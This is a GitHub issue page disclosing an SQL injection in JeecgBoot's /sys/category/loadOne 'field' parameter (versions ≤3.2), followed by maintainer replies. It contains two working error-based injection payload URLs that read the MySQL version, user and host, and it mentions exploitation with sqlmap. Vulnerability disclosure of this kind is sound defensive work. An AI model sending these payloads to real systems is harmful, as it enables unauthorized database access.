-
Notifications
You must be signed in to change notification settings - Fork 14.9k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Jeecg - boot/jeecg - boot/sys/category/loadOne interface field parameters have SQL injection #3663
Comments
收录 ty |
the menu "classified dictionary", there is no interface that you described to be called, if you want to test this interface |
i got it , you can try like this:
|
已处理 |
@zhangdaiscott 请问,对应的commit是哪个? |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
版本号:
<=3.2
问题描述:
After tests found that the jeecg - boot/jeecg - boot/sys/category/loadOne interface field parameters have SQL injection.
SQL injection exists in an interface that queries the data of the classification dictionary. After using the https://github.com/jeecgboot/jeecg-boot project source code download the launcher, grab packets SQL injection can be performed after modified, and illustrates the use of the sqlmap SQL injection.
The data received by the interface is consistent with the data in the classification dictionary, but it is not the production interface of the classification dictionary. The following two figures:
截图&代码:
Payload (view MySQL version):/jeecg-boot/sys/category/loadOne?_t=1651480890&field=extractvalue(1,concat(char(126),(version()),md5(1678381038)))&val=f39a06bf9f390ba4a53d11bc4e0018d7
Payload (view the current user name and host name of MySQL):/jeecg-boot/sys/category/loadOne?_t=1651480890&field=extractvalue(1,concat(char(126),(user()),md5(1678381038)))&val=f39a06bf9f390ba4a53d11bc4e0018d7
Results injected using sqlmap:
Getting the database:
Here is the risk code:
友情提示(为了提高issue处理效率):
The text was updated successfully, but these errors were encountered: